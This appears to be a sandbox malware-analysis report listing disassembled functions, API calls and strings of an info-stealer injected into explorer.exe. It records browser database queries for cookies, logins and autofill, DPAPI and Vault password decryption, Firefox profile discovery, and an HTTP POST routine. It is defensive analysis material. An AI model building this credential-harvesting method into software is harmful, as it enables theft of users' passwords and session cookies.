DeleteFileW.KERNELBASE(00000000), ref: 006E3789
CopyFileW.KERNELBASE(?,00000000,00000000), ref: 006E3794
RtlCompareMemory.NTDLL(00000000,?,00000003), ref: 006E383B
RtlZeroMemory.NTDLL(?,00000040), ref: 006E3870
lstrlen.KERNEL32(?,?,?,?,?), ref: 006E398B
lstrlen.KERNEL32(00000000), ref: 006E399A
wsprintfA.USER32 ref: 006E39F1
lstrlen.KERNEL32(00000000,?,?), ref: 006E39FD
lstrcat.KERNEL32(00000000,?), ref: 006E3A21
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 006E3A49
lstrlen.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 006E3B13
lstrlen.KERNEL32(00000000), ref: 006E3B22
wsprintfA.USER32 ref: 006E3B79
lstrlen.KERNEL32(00000000), ref: 006E3B85
lstrcat.KERNEL32(00000000,?), ref: 006E3BA9
lstrlen.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 006E3BDA
DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 006E3C16

Strings

COOKIES, xrefs: 006E3BE8, 006E3BED, 006E3BF6
%sTRUE%s%s%s%s%s, xrefs: 006E39EB, 006E3B73
v1, xrefs: 006E3821
SELECT host_key,path,is_secure,name,encrypted_value FROM cookies, xrefs: 006E37C3
0, xrefs: 006E3828
TRUE, xrefs: 006E39C9, 006E3B51
FALSE, xrefs: 006E39BC, 006E3B3C

Memory Dump Source

Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd

Similarity

API ID: lstrlen$File$DeleteMemoryTemplstrcatwsprintf$CloseCompareCopyCreateCryptDataHandleNamePathUnprotectZero
String ID: %sTRUE%s%s%s%s%s$0$COOKIES$FALSE$SELECT host_key,path,is_secure,name,encrypted_value FROM cookies$TRUE$v1
API String ID: 584740257-404540950
Opcode ID: 31130a8774816bdb3ec2b4f542a81e7fb5135f7783b83731a19975052f81c530
Instruction ID: ec9aa9e9f404efa426bec8b684020718a6ca498cc789244fd5ab3343ab56220a
Opcode Fuzzy Hash: 31130a8774816bdb3ec2b4f542a81e7fb5135f7783b83731a19975052f81c530
Instruction Fuzzy Hash: 81E1BE7060A391AFE715DF26C888A6FBBEAAF85744F04882CF4858B351DB35CD44CB56

Function 006E2198 Relevance: 33.5, APIs: 12, Strings: 7, Instructions: 242
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlZeroMemory.NTDLL(?,00000114), ref: 006E21AF
GetVersionExW.KERNEL32(?), ref: 006E21BE
LoadLibraryW.KERNELBASE(vaultcli.dll), ref: 006E21E8
GetProcAddress.KERNEL32(00000000,VaultOpenVault), ref: 006E220A
GetProcAddress.KERNEL32(00000000,VaultCloseVault), ref: 006E2214
GetProcAddress.KERNEL32(00000000,VaultEnumerateItems), ref: 006E2220
GetProcAddress.KERNEL32(00000000,VaultGetItem), ref: 006E222A
GetProcAddress.KERNEL32(00000000,VaultFree), ref: 006E2236
RtlCompareMemory.NTDLL(?,00741110,00000010), ref: 006E22E8
RtlCompareMemory.NTDLL(?,00741110,00000010), ref: 006E236C

Part of subcall function 006E1953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,006E2F0C), ref: 006E1973
Part of subcall function 006E1953: lstrlenW.KERNEL32(00736564,?,?,006E2F0C), ref: 006E1978
Part of subcall function 006E1953: lstrcatW.KERNEL32(00000000,?,?,?,006E2F0C), ref: 006E1990
Part of subcall function 006E1953: lstrcatW.KERNEL32(00000000,00736564,?,?,006E2F0C), ref: 006E1994

StrStrIW.SHLWAPI(?,Internet Explorer), ref: 006E23FE
FreeLibrary.KERNELBASE(00000000), ref: 006E2493

Strings

VaultGetItem, xrefs: 006E2222
VaultOpenVault, xrefs: 006E2204
vaultcli.dll, xrefs: 006E21E3
Internet Explorer, xrefs: 006E23F8
VaultFree, xrefs: 006E222C
VaultCloseVault, xrefs: 006E220C
VaultEnumerateItems, xrefs: 006E2216

Memory Dump Source

Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd

Similarity

API ID: AddressProc$Memory$CompareLibrarylstrcatlstrlen$FreeLoadVersionZero
String ID: Internet Explorer$VaultCloseVault$VaultEnumerateItems$VaultFree$VaultGetItem$VaultOpenVault$vaultcli.dll
API String ID: 2583887280-2831467701
Opcode ID: 52615efd3ecce01e6c26379cf0dab43e5a7faf74b48a5813cb86a4a46d668b23
Instruction ID: b430acb6eb9d66a2ecc7c828179bfd6c26e0ffec78c51c40cab9eca0828a0f1f
Opcode Fuzzy Hash: 52615efd3ecce01e6c26379cf0dab43e5a7faf74b48a5813cb86a4a46d668b23
Instruction Fuzzy Hash: 63919C71A09382AFD714DF62C895A6FBBEBAF89704F00882DF5859B251DB74D801CB52

Function 006E3098 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 248
fileencryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 006E1B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,006E2893,00000000,00000000,00000000,?), ref: 006E1B82
Part of subcall function 006E1B6A: CloseHandle.KERNELBASE(00000000), ref: 006E1B8F

GetTempPathW.KERNEL32(00000104,00000000), ref: 006E30F9
GetTempFileNameW.KERNELBASE(00000000,00000000,00000000,00000000), ref: 006E3103
DeleteFileW.KERNELBASE(00000000), ref: 006E310A
CopyFileW.KERNELBASE(?,00000000,00000000), ref: 006E3115
RtlCompareMemory.NTDLL(00000000,00000000,00000003), ref: 006E31A4
RtlZeroMemory.NTDLL(?,00000040), ref: 006E31D7
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 006E32DF
DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 006E339C

Strings

@, xrefs: 006E31F1
v1, xrefs: 006E318A
SELECT origin_url,username_value,password_value FROM logins, xrefs: 006E3136
0, xrefs: 006E3191

Memory Dump Source

Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd

Similarity

API ID: File$DeleteMemoryTemp$CloseCompareCopyCreateCryptDataHandleNamePathUnprotectZero
String ID: 0$@$SELECT origin_url,username_value,password_value FROM logins$v1
API String ID: 2757140130-4052020286
Opcode ID: 73fcf0006881dbbe7616522a19b51d9307156ad354e09354f4eeeed1838328d5
Instruction ID: 89a92677bd57e6526082bc2cc2907ea392a75ff97260d3ae76bfde2291582840
Opcode Fuzzy Hash: 73fcf0006881dbbe7616522a19b51d9307156ad354e09354f4eeeed1838328d5
Instruction Fuzzy Hash: 52919B70209381AFE710DF26C848E6FBBEAAF86744F04492CF58597391DB35DE448B66

Function 006E3ED9 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 82
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 006E1000: GetProcessHeap.KERNEL32(00000008,?,006E11C7,?,?,00000001,00000000,?), ref: 006E1003
Part of subcall function 006E1000: RtlAllocateHeap.NTDLL(00000000), ref: 006E100A

PathCombineW.SHLWAPI(00000000,00000000,*.*,?,00000000), ref: 006E3F0A
FindFirstFileW.KERNELBASE(00000000,?,?,00000000), ref: 006E3F16
lstrcmpiW.KERNEL32(?,007362CC), ref: 006E3F38
lstrcmpiW.KERNEL32(?,007362D0), ref: 006E3F4C
PathCombineW.SHLWAPI(00000000,00000000,?), ref: 006E3F69
lstrcmpiW.KERNEL32(?,Local State), ref: 006E3F7E
PathCombineW.SHLWAPI(00000000,00000000,?), ref: 006E3F9B
FindNextFileW.KERNELBASE(00000000,00000010), ref: 006E3FB5
FindClose.KERNELBASE(00000000), ref: 006E3FC4

Strings

*.*, xrefs: 006E3F01
Local State, xrefs: 006E3F78

Memory Dump Source

Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd

Similarity

API ID: CombineFindPathlstrcmpi$FileHeap$AllocateCloseFirstNextProcess
String ID: *.*$Local State
API String ID: 3923353463-3324723383
Opcode ID: 74fe72e0f915474cfc79e37a5ea9a3568110000b1af9137f29e75f90941cd610
Instruction ID: e16ccf8ef76533571eaf3a686d865f98b974207147ac2a5580349fada97a0548
Opcode Fuzzy Hash: 74fe72e0f915474cfc79e37a5ea9a3568110000b1af9137f29e75f90941cd610
Instruction Fuzzy Hash: 9221A4316013947BE754AB328C4DE7F766EDF82702F04851DB812C7392EF789A488669

Function 006E2B15 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 102
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 006E1953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,006E2F0C), ref: 006E1973
Part of subcall function 006E1953: lstrlenW.KERNEL32(00736564,?,?,006E2F0C), ref: 006E1978
Part of subcall function 006E1953: lstrcatW.KERNEL32(00000000,?,?,?,006E2F0C), ref: 006E1990
Part of subcall function 006E1953: lstrcatW.KERNEL32(00000000,00736564,?,?,006E2F0C), ref: 006E1994

FindFirstFileW.KERNELBASE(00000000,?,00000000,00000000,?,00000000), ref: 006E2B3D
lstrcmpiW.KERNEL32(?,007362CC), ref: 006E2B63
lstrcmpiW.KERNEL32(?,007362D0), ref: 006E2B7B

Part of subcall function 006E19B4: lstrlenW.KERNEL32(00000000,00000000,00000000,006E2CAF,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 006E19C4

StrStrIW.SHLWAPI(00000000,logins.json), ref: 006E2BE7
StrStrIW.SHLWAPI(00000000,cookies.sqlite), ref: 006E2C16
FindNextFileW.KERNELBASE(00000000,00000010), ref: 006E2C43
FindClose.KERNELBASE(00000000), ref: 006E2C52

Strings

\*.*, xrefs: 006E2B15
cookies.sqlite, xrefs: 006E2C10
logins.json, xrefs: 006E2BE1

Memory Dump Source

Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd

Similarity

API ID: Findlstrlen$Filelstrcatlstrcmpi$CloseFirstNext
String ID: \*.*$cookies.sqlite$logins.json
API String ID: 1108783765-3717368146
Opcode ID: fb93a90e4b946c866358a17dbc2f51fc68354cd6b567ec0dce0c27fec2188d3e
Instruction ID: e98d77187f36e5130bd8a58413d199ac43786fa4f3eaf2f55c3d37e0136ea0d6
Opcode Fuzzy Hash: fb93a90e4b946c866358a17dbc2f51fc68354cd6b567ec0dce0c27fec2188d3e
Instruction Fuzzy Hash: 5F31B4303053865BDB54AB328CA997F63DFAB85B05F14853CB845C7282EF7CCD45A269

Function 006E1D4A Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 109
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 006E19B4: lstrlenW.KERNEL32(00000000,00000000,00000000,006E2CAF,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 006E19C4

FindFirstFileW.KERNELBASE(00000000,?,?,00000000), ref: 006E1DA9
lstrcmpiW.KERNEL32(?,007362CC), ref: 006E1DCF
lstrcmpiW.KERNEL32(?,007362D0), ref: 006E1DE7
lstrcmpiW.KERNEL32(?,?), ref: 006E1E62

Part of subcall function 006E1CF7: lstrlenW.KERNEL32(00000000,00000000,00000000,006E2C27), ref: 006E1D02
Part of subcall function 006E1CF7: RtlComputeCrc32.NTDLL(00000000,00000000,00000000), ref: 006E1D0D

FindNextFileW.KERNELBASE(00000000,00000010), ref: 006E1E94
FindClose.KERNELBASE(00000000), ref: 006E1EA3

Part of subcall function 006E1953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,006E2F0C), ref: 006E1973
Part of subcall function 006E1953: lstrlenW.KERNEL32(00736564,?,?,006E2F0C), ref: 006E1978
Part of subcall function 006E1953: lstrcatW.KERNEL32(00000000,?,?,?,006E2F0C), ref: 006E1990
Part of subcall function 006E1953: lstrcatW.KERNEL32(00000000,00736564,?,?,006E2F0C), ref: 006E1994

Strings

*.*, xrefs: 006E1D8B
\*.*, xrefs: 006E1D79

Memory Dump Source

Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd

Similarity

API ID: lstrlen$Findlstrcmpi$Filelstrcat$CloseComputeCrc32FirstNext
String ID: *.*$\*.*
API String ID: 232625764-1692270452
Opcode ID: b0e063b45b4c8f2698a5a8a64c2e86a23d1bcb1a845221ad1db8e17ea07828bc
Instruction ID: fd98085c021f9774e703884b4474e6ab7b4ea52116ab90cfcf19e518b227cbd3
Opcode Fuzzy Hash: b0e063b45b4c8f2698a5a8a64c2e86a23d1bcb1a845221ad1db8e17ea07828bc
Instruction Fuzzy Hash: C631D7303053815BDB24AB328899EAF76EBAFC6301F04852CF9468B356EB34CC05A655

Function 006E3E04 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 75
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 006E1B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,006E2893,00000000,00000000,00000000,?), ref: 006E1B82
Part of subcall function 006E1B6A: CloseHandle.KERNELBASE(00000000), ref: 006E1B8F

Part of subcall function 006E1C31: CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000000,00000000,00000000,006E3E1E,00000000,?,006E3FA8), ref: 006E1C46
Part of subcall function 006E1C31: GetFileSize.KERNEL32(00000000,00000000,00000000,?,006E3FA8), ref: 006E1C56
Part of subcall function 006E1C31: ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000,?,006E3FA8), ref: 006E1C76
Part of subcall function 006E1C31: CloseHandle.KERNELBASE(00000000,?,006E3FA8), ref: 006E1C91

Part of subcall function 006E2FB1: StrStrIA.KERNELBASE(00000000,"encrypted_key":",00000000,00000000,00000000,006E3E30,00000000,00000000,?,006E3FA8), ref: 006E2FC1
Part of subcall function 006E2FB1: lstrlen.KERNEL32("encrypted_key":",?,006E3FA8), ref: 006E2FCE
Part of subcall function 006E2FB1: StrStrIA.SHLWAPI("encrypted_key":",0073692C,?,006E3FA8), ref: 006E2FDD

Part of subcall function 006E123B: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,006E3E4B,00000000), ref: 006E124A
Part of subcall function 006E123B: CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 006E1268
Part of subcall function 006E123B: CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 006E1295

RtlCompareMemory.NTDLL(00000000,IDPAP,00000005), ref: 006E3E74
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 006E3E9E

Strings

IDPAP, xrefs: 006E3E6E, 006E3E72
, xrefs: 006E3EA8
DPAP, xrefs: 006E3E52
DPAP, xrefs: 006E3E5A

Memory Dump Source

Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd

Similarity

API ID: File$Crypt$BinaryCloseCreateHandleStringlstrlen$CompareDataMemoryReadSizeUnprotect
String ID: $DPAP$DPAP$IDPAP
API String ID: 3076719866-957854035
Opcode ID: 21814550b09f1b7e6b6ef76842d03c31cc286cfae418d3f6cfe410072202dd61
Instruction ID: cbd404f89172277b4e40248d3d0817a9428b9762f553a5483014e1dc7ee90b23
Opcode Fuzzy Hash: 21814550b09f1b7e6b6ef76842d03c31cc286cfae418d3f6cfe410072202dd61
Instruction Fuzzy Hash: FC2192726063956BD721EA668C84ABFB7DEAB84700F44052EF841CB301EF74CE4987D6

Function 006E4B92 Relevance: 3.0, APIs: 2, Instructions: 26nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 006E1162: VirtualQuery.KERNEL32(?,?,0000001C), ref: 006E116F

RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 006E4BB6
NtUnmapViewOfSection.NTDLL(000000FF), ref: 006E4BBF

Memory Dump Source

Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd

Similarity

API ID: MemoryMoveQuerySectionUnmapViewVirtual
String ID:
API String ID: 1675517319-0
Opcode ID: b30c2ad36f8962a046b9e6ee6b97ccecfd610f7747b20ef1ceb8c93dffea5726
Instruction ID: 9b444287c071ec998e1a33d5dfe148b82bc443f651c9ee474a28418013c9b3ff
Opcode Fuzzy Hash: b30c2ad36f8962a046b9e6ee6b97ccecfd610f7747b20ef1ceb8c93dffea5726
Instruction Fuzzy Hash: 2BE0D83190739067C7987B32BC0DE8B3B5B9F92361F10C91DB25586190CF36C8418668

Function 006E6512 Relevance: 1.5, APIs: 1, Instructions: 34COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNELBASE(007420A4,00000001,00000000,0000000A,00733127,006E28DA,00000000,?), ref: 006EBFFC

Memory Dump Source

Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: 342ae006ccbddde6d99fee0480ed66ad17038b3f9da80c53f6b54561cc8af586
Instruction ID: 701ec3f1d99456005f87ca56fe1de9ac258226ef5df55f974011c651c2b8a2a0
Opcode Fuzzy Hash: 342ae006ccbddde6d99fee0480ed66ad17038b3f9da80c53f6b54561cc8af586
Instruction Fuzzy Hash: 65E012717C638075E69037BAEC07F9B15574BA1F91FE08529B610A91CEDBA99181102A

Function 006E3C40 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 147
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 006E1B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,006E2893,00000000,00000000,00000000,?), ref: 006E1B82
Part of subcall function 006E1B6A: CloseHandle.KERNELBASE(00000000), ref: 006E1B8F

Part of subcall function 006E1000: GetProcessHeap.KERNEL32(00000008,?,006E11C7,?,?,00000001,00000000,?), ref: 006E1003
Part of subcall function 006E1000: RtlAllocateHeap.NTDLL(00000000), ref: 006E100A

GetTempPathW.KERNEL32(00000104,00000000), ref: 006E3C6A
GetTempFileNameW.KERNELBASE(00000000,00000000,00000000,00000000), ref: 006E3C76
DeleteFileW.KERNELBASE(00000000), ref: 006E3C7D
CopyFileW.KERNELBASE(?,00000000,00000000), ref: 006E3C89
lstrlen.KERNEL32(00000000,?,?,?,?,00000000,00000000,?), ref: 006E3D2F
lstrlen.KERNEL32(00000000), ref: 006E3D36
wsprintfA.USER32 ref: 006E3D55
lstrlen.KERNEL32(00000000), ref: 006E3D61
lstrcat.KERNEL32(00000000,?), ref: 006E3D89
lstrlen.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 006E3DB2
DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 006E3DED

Strings

AUTOFILL, xrefs: 006E3DBD, 006E3DC2, 006E3DCC
SELECT name,value FROM autofill, xrefs: 006E3CAA
%s = %s, xrefs: 006E3D4F

Memory Dump Source

Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd

Similarity

API ID: File$lstrlen$DeleteHeapTemp$AllocateCloseCopyCreateHandleNamePathProcesslstrcatwsprintf
String ID: %s = %s$AUTOFILL$SELECT name,value FROM autofill
API String ID: 2923052733-3488123210
Opcode ID: 653a620d5f77dfc0eb92f9f53983bdda69aafadaae7863b3836c58d7839d0d11
Instruction ID: 13100714e721818115832893ce7566637e647a457e9195610108b71e6bb03f6d
Opcode Fuzzy Hash: 653a620d5f77dfc0eb92f9f53983bdda69aafadaae7863b3836c58d7839d0d11
Instruction Fuzzy Hash: A141E430605395ABE710AB32CC85D7F76AFEF86745F00882CF441A7352DA39DD059B66

Function 006E28F8 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 158
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 006E2AD2

Part of subcall function 006E1000: GetProcessHeap.KERNEL32(00000008,?,006E11C7,?,?,00000001,00000000,?), ref: 006E1003
Part of subcall function 006E1000: RtlAllocateHeap.NTDLL(00000000), ref: 006E100A

lstrlen.KERNEL32(00000000,?,?,?,?,?,?), ref: 006E29E1
lstrlen.KERNEL32(00000000), ref: 006E29EC
wsprintfA.USER32 ref: 006E2A38
lstrlen.KERNEL32(00000000), ref: 006E2A44
lstrcat.KERNEL32(00000000,00000000), ref: 006E2A6C
lstrlen.KERNEL32(00000000,?,?), ref: 006E2A99

Strings

COOKIES, xrefs: 006E2AA4, 006E2AAB, 006E2AB1
%sTRUE%s%s%s%s%s, xrefs: 006E2A32
TRUE, xrefs: 006E2A13
FALSE, xrefs: 006E2A06

Memory Dump Source

Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd

Similarity

API ID: lstrlen$Heap$AllocateDeleteFileProcesslstrcatwsprintf
String ID: %sTRUE%s%s%s%s%s$COOKIES$FALSE$TRUE
API String ID: 304071051-2605711689
Opcode ID: 6dcce1e7527195c79b45f56fb4d216a169b07683a9ea59d842e2d6142aba48dc
Instruction ID: ee855d84588c43cc6b2cc820128578134b113eea89fedc8044f1cb332f1a7780
Opcode Fuzzy Hash: 6dcce1e7527195c79b45f56fb4d216a169b07683a9ea59d842e2d6142aba48dc
Instruction Fuzzy Hash: CD51D1306063C79BD725EF2288A1A7E76DBAF86305F04482CF4819B253DB39CC459766

Function 006E2CB5 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 112
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 006E1953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,006E2F0C), ref: 006E1973
Part of subcall function 006E1953: lstrlenW.KERNEL32(00736564,?,?,006E2F0C), ref: 006E1978
Part of subcall function 006E1953: lstrcatW.KERNEL32(00000000,?,?,?,006E2F0C), ref: 006E1990
Part of subcall function 006E1953: lstrcatW.KERNEL32(00000000,00736564,?,?,006E2F0C), ref: 006E1994

Part of subcall function 006E1000: GetProcessHeap.KERNEL32(00000008,?,006E11C7,?,?,00000001,00000000,?), ref: 006E1003
Part of subcall function 006E1000: RtlAllocateHeap.NTDLL(00000000), ref: 006E100A

Part of subcall function 006E1B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,006E2893,00000000,00000000,00000000,?), ref: 006E1B82
Part of subcall function 006E1B6A: CloseHandle.KERNELBASE(00000000), ref: 006E1B8F

GetPrivateProfileSectionNamesW.KERNEL32(00000000,0000FDE8,00000000), ref: 006E2D13
StrStrIW.SHLWAPI(00000000,Profile), ref: 006E2D45
GetPrivateProfileStringW.KERNEL32(00000000,Path,0073637C,?,00000FFF,?), ref: 006E2D68
GetPrivateProfileIntW.KERNEL32(00000000,IsRelative,00000001,?), ref: 006E2D7B
lstrlenW.KERNEL32(00000000), ref: 006E2DD8

Strings

IsRelative, xrefs: 006E2D75
Profile, xrefs: 006E2D3F
Path, xrefs: 006E2D62
profiles.ini, xrefs: 006E2CCD

Memory Dump Source

Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd

Similarity

API ID: PrivateProfilelstrlen$Heaplstrcat$AllocateCloseCreateFileHandleNamesProcessSectionString
String ID: IsRelative$Path$Profile$profiles.ini
API String ID: 2234428054-4107377610
Opcode ID: 3c2691cba5ddb76330f773d32f2c66458c6b71137abcfce1d0c9a23b4a691da9
Instruction ID: dc3ecc6faafa7d3bf89c674c0dbfb83404c5de8285d17f4a564f4850e00a6d89
Opcode Fuzzy Hash: 3c2691cba5ddb76330f773d32f2c66458c6b71137abcfce1d0c9a23b4a691da9
Instruction Fuzzy Hash: FC3192307053825BD764AF328C2166F76A7AFC9700F10843DFA45AB392DE798C469756

Function 006E1333 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 226
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 006E1000: GetProcessHeap.KERNEL32(00000008,?,006E11C7,?,?,00000001,00000000,?), ref: 006E1003
Part of subcall function 006E1000: RtlAllocateHeap.NTDLL(00000000), ref: 006E100A

Part of subcall function 006E106C: lstrlen.KERNEL32(02FF710E,00000000,00000000,00000000,006E1366,75918A60,02FF710E,00000000), ref: 006E1074
Part of subcall function 006E106C: MultiByteToWideChar.KERNEL32(00000000,00000000,02FF710E,00000001,00000000,00000000), ref: 006E1086

Part of subcall function 006E12A3: RtlZeroMemory.NTDLL(?,00000018), ref: 006E12B5

RtlZeroMemory.NTDLL(?,0000003C), ref: 006E13C2
wsprintfW.USER32 ref: 006E14B5
RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 006E1594

Strings

Content-Type: application/x-www-form-urlencoded, xrefs: 006E14FB
POST, xrefs: 006E1465
Accept: */*Referer: %S, xrefs: 006E14AF

Memory Dump Source

Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd

Similarity

API ID: Memory$HeapZero$AllocateByteCharMoveMultiProcessWidelstrlenwsprintf
String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$POST
API String ID: 3833683434-704803497
Opcode ID: 04d02000598993678688d28c929897cacfe90da5d58fb7a9621ec389f12c9a5f
Instruction ID: 911376b14cea50873f3789db3118ee50e09b96f85ed7c4a0eb9db1144ee0f699
Opcode Fuzzy Hash: 04d02000598993678688d28c929897cacfe90da5d58fb7a9621ec389f12c9a5f
Instruction Fuzzy Hash: 9A719AB1609385AFE7109F25DC84A6BBBEAFB89344F00892DF941CB351DB34CE049B56

Function 006EA40E Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 116
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memcpy.NTDLL(?,?,?), ref: 006EA455
memcpy.NTDLL(?,?,?), ref: 006EA479
ReadFile.KERNELBASE(?,?,?,?,?), ref: 006EA4DB
memset.NTDLL ref: 006EA546

Strings

Ss, xrefs: 006EA4DB
winRead, xrefs: 006EA515

Memory Dump Source

Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd

Similarity

API ID: memcpy$FileReadmemset
String ID: winRead$Ss
API String ID: 2051157613-1370720004
Opcode ID: 3c4c5b452333d57c5713253cad829c9ee36210e6dfe42086905bfe13711b2d68
Instruction ID: a053ffb4b209abd8fdf239c6edd760bfe5e2fbc5222e3dc1a9e3a474ab18689c
Opcode Fuzzy Hash: 3c4c5b452333d57c5713253cad829c9ee36210e6dfe42086905bfe13711b2d68
Instruction Fuzzy Hash: AC31897220A380EBD740DE99CC8599F77E7EFC4310F845928F98587251E270ED058B93

Function 006EA67C Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 78
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_alldiv.NTDLL(?,?,?), ref: 006EA6AD
_allmul.NTDLL(00000000,?,?), ref: 006EA6B6
SetEndOfFile.KERNELBASE(?), ref: 006EA6F3

Strings

winTruncate2, xrefs: 006EA717
@Ts, xrefs: 006EA6F3
winTruncate1, xrefs: 006EA6DF

Memory Dump Source

Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd

Similarity

API ID: File_alldiv_allmul
String ID: @Ts$winTruncate1$winTruncate2
API String ID: 3568847005-2922925224
Opcode ID: 72edf3f2c0d54819e5ea43fd690f5ba89548cb9cfff309111bdac35d9b4fb6dd
Instruction ID: 1da53c2650cf2ae964078bad6c16d3cdd054d50ca905b3bb4b68ed7365f0b2c0
Opcode Fuzzy Hash: 72edf3f2c0d54819e5ea43fd690f5ba89548cb9cfff309111bdac35d9b4fb6dd
